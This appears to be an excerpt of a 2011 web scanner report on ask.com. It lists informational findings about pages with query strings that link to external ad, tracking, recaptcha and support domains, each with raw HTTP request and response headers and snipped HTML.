<a href="http://www.google.com/aclk?sa=l&ai=CqPBrgctBTdbPOIGagQesoPyJD-2R_78Br7bGshWQqMEHEAYgxZDVESgKUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Qkj_t3-SQxcn8A8UELuVrx18GN_TrlFsRaclzzA8&num=6&sig=AGiWqtw99Sm14Es4gtjDrzG_bpsrad8eXg&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/" onMouseDown="marketingPickPixel(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'d',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'ggr_0');" class="nu" onmouseover="return ss('www.<b>boat</b>erexam.com/DC')" onmouseout="cs()" style="display:block;padding-top:10px;padding-bottom:10px;">

<span class="newAdFont" id="ggr_0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CKVk7gctBTdbPOIGagQesoPyJD7mE0JEB5bzl4g2WtePoBRAHIMWQ1REoClCappSzAmDJhqOH1KOAEMgBAaoEHE_Q4hfO3-WQxYH88dLWhs20u1gKKS5bkDNOELU&num=7&sig=AGiWqtxPFl3s7xQ4w3a8wnKtgBJ7fql01w&adurl=http://www.pronto.com/user/search.do%3FdisplayQuery%3Dboat%2520controller%26SEM%3Dtrue%26query%3Dboat%2520controller%26adid%3D1189390548-2826256-0_gs%26ref%3Dboat%2520controller%26creativeid%3D3593539869%26site%3D" onMouseDown="marketingPickPixel(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'d',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'ggr_1');" class="nu" onmouseover="return ss('www.pronto.com')" onmouseout="cs()" style="display:block;padding-top:0px;padding-bottom:10px;">

<span class="newAdFont" id="ggr_1">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CLq00gctBTdbPOIGagQesoPyJD6Gt3D3Rh5_cA-vXuQgQCCDFkNURKApQurXcwgdgyYajh9SjgBCgAde7gf8DyAEBqgQZT9CSA9nf6pDFyfwD1AXhyrilgrotRgTpTw&num=8&sig=AGiWqtwAInSuzmyEagutrT21QgKH-KtdKg&adurl=http://www.boatbandit.com" onMouseDown="marketingPickPixel(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'d',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'ggr_2');" class="nu" onmouseover="return ss('www.<b>boat</b>bandit.com')" onmouseout="cs()" style="display:block;padding-top:0px;padding-bottom:10px;">

<span class="newAdFont" id="ggr_2">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CRohTgctBTdbPOIGagQesoPyJD6m56-UBwajxhRr2oegREAkgxZDVESgKUNibpfwBYMmGo4fUo4AQyAEBqgQcT9DCasrf65DFyfwDxQRA1lXIXwY39OuUWxFpyQ&num=9&sig=AGiWqtw56j98594NOijkPKtN7Vz_LwRjHA&adurl=http://www.nextag.com/goto.jsp%3Fp%3D5033%26search%3Dregulator%2520boat%26t%3Dag%253D617290353%26crid%3D27690872%26gg_aid%3D6899340753%26gg_site%3D" onMouseDown="marketingPickPixel(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'d',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'ggr_3');" class="nu" onmouseover="return ss('www.nextag.com')" onmouseout="cs()" style="display:block;padding-top:0px;padding-bottom:10px;">

<span class="newAdFont" id="ggr_3">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=CbpvDgctBTdbPOIGagQesoPyJD7uDmdQBs5a0vBad5rY0EAogxZDVESgKUN-vkL8BYMmGo4fUo4AQoAGF2f_kA8gBAakCERiDOCMLtz6qBB9P0NIczd_okMXJ_APFBEqZN8hfBjf065RbEWnJc8wP&num=10&sig=AGiWqty5AEuKcQ7jOdICv6hb5hVvJ9Gitw&adurl=http://www.best-deal.com/search/landing/query/parts%2Bboats/s/google/koid/8140617321/" onMouseDown="marketingPickPixel(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'d',ec:'5',ex:'sgcl%3D3998wL-is5qg78%26sgch%3D'},'ggr_4');" class="nu" onmouseover="return ss('www.parts-<b>boat</b>s.best-deal.com')" onmouseout="cs()" style="display:block;padding-top:0px;padding-bottom:10px;">

<span class="newAdFont" id="ggr_4">
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/A+Regulator+Gene+Produces+Which+of+the+Following?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr1',io:'0',b:'rlt',tp:'d',ec:'19'})" >A <b>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Air+Pressure+Regulator?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr1',io:'1',b:'rlt',tp:'d',ec:'19'})" >Air Pressure <b>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/CO2+Regulator?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr1',io:'2',b:'rlt',tp:'d',ec:'19'})" >CO2 <b>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Fuel+Pressure+Regulator?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr1',io:'3',b:'rlt',tp:'d',ec:'19'})" >Fuel Pressure <b>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Fuel+Pressure+Regulator+Install?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr1',io:'4',b:'rlt',tp:'d',ec:'19'})" >Fuel Pressure <b>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Fuel+Pressure+Regulator+Problems?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr1',io:'5',b:'rlt',tp:'d',ec:'19'})" >Fuel Pressure <b>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Contender+Boats?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr2',io:'6',b:'rlt',tp:'d',ec:'3'})" >Contender <b>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Rack+renting?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr2',io:'7',b:'rlt',tp:'d',ec:'3'})" >Rack renting</a>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Viking+Yacht?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr2',io:'8',b:'rlt',tp:'d',ec:'3'})" >Viking Yacht</a>
...[SNIP]...
<div class="zm" ><a href="http://ask.reference.com/related/Warren+G?o=15096&l=dir" class="L6" onmousedown="return pk(this,{en:'rr3',io:'9',b:'rlt',tp:'d',ec:'1'})" >Warren G</a>
...[SNIP]...
<noscript>
<img width="1" height="1" src="http://pixel1370.everesttech.net/1370/p?ev_transid=0A4EDD4111C033B329ACD8C41BD460F3&ev_clara_user=1&ev_clara_session_id=014DDB4118C033B329ACD8C41BD460F3&ev_clara_Sports/Sporting_Goods_query_id=D3C44EEC3B3D878C4B9BF746F65F79E2" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://switch.atdmt.com/iaction/askane_ResultsCT7DayVT1Day_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
<iframe src="http://switch.atdmt.com/action/askane_ResultsCT90DayVT90Day_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

12.8. http://www.ask.com/answers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/answers?qsrc=167&o=0&l=dir

The response contains the following links to other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir

Request

GET /answers?qsrc=167&o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:29 GMT
Content-Length: 29312
Connection: close
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:29 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:29 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:29 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>My Questions & Answers - Ask Community</title><link REL="shortcut icon" HREF="http://sp.ask.com/sh/i/a14/favicon/favicon.ico"
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li><a href="http://www.askkids.com?o=0&l=dir"class="txt3 b" style="">Kids</a>
...[SNIP]...
</a>, or, <a class="txt3 title b" href="http://asksupport.custhelp.com/app/answers/list" target="_blank">report a problem</a>
...[SNIP]...
</span><a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">Careers</a>
...[SNIP]...
</span><a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">Help</a>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
</script><script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.9. http://www.ask.com/answers/000/Notification previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers/000/Notification

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/answers/000/Notification?qsrc=3096

The response contains the following links to other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir

Request

GET /answers/000/Notification?qsrc=3096 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:46:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:46:43 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjQzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:43 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:43 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 34549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.10. http://www.ask.com/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/homepage

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/homepage?q=&o=0&l=dir&page=1

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;cata=sports;catb=sporting_goods;log=0;s=as;hhi=159;test=0;ord=1296157524404?
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1205697072?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom

Request

GET /homepage?q=&o=0&l=dir&page=1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:45:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:24 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjI0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:24 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:24 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 93680

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<noscript><iframe id="adi" src="http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;cata=sports;catb=sporting_goods;log=0;s=as;hhi=159;test=0;ord=1296157524404?" width="300" height="250" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1205697072?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

12.11. http://www.ask.com/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/homepage

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/homepage?q=&o=0&l=dir&page=1

The response contains the following links to other domains:

http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1296155645319?
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-223375324?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom

Request

GET /homepage?q=&o=0&l=dir&page=1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:14:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:14:05 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE0OjA1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/
Content-Length: 81693

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
<noscript><iframe id="adi" src="http://ad.doubleclick.net/adi/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1296155645319?" width="300" height="250" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_h504;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-223375324?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

12.12. http://www.ask.com/iPhone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/iPhone

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/iPhone?o=0&l=dir

The response contains the following links to other domains:

http://itunes.apple.com/us/app/ask-com/id394464350?mt=8
http://www.nuance.com/

Request

GET /iPhone?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 06 Jan 2011 00:29:18 GMT
Date: Thu, 27 Jan 2011 19:13:57 GMT
Content-Length: 11255
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>
<a href="http://itunes.apple.com/us/app/ask-com/id394464350?mt=8" onClick="recordOutboundLink(this, 'itunes click', 'itunes.com');return false;"><div class="spriteButton">
...[SNIP]...
<div class="boxImage" style="">

<a href="http://itunes.apple.com/us/app/ask-com/id394464350?mt=8" onClick="recordOutboundLink(this, 'itunes click', 'itunes.com');return false;"><div class="spriteApple" style="float:left;margin-left:20px" >
...[SNIP]...
<span><a href="http://www.nuance.com/"><div class="nuance" style="float:right;" >
...[SNIP]...

12.13. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/ja-ask-dialog?src=serp&thinHeader=true&fullFlex=false

The response contains the following link to another domain:

http://asksupport.custhelp.com/app/answers/list

Request

Response

12.14. http://www.ask.com/jsignin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/jsignin

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/jsignin?o=0&l=dir

The response contains the following links to other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.15. http://www.ask.com/pictures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

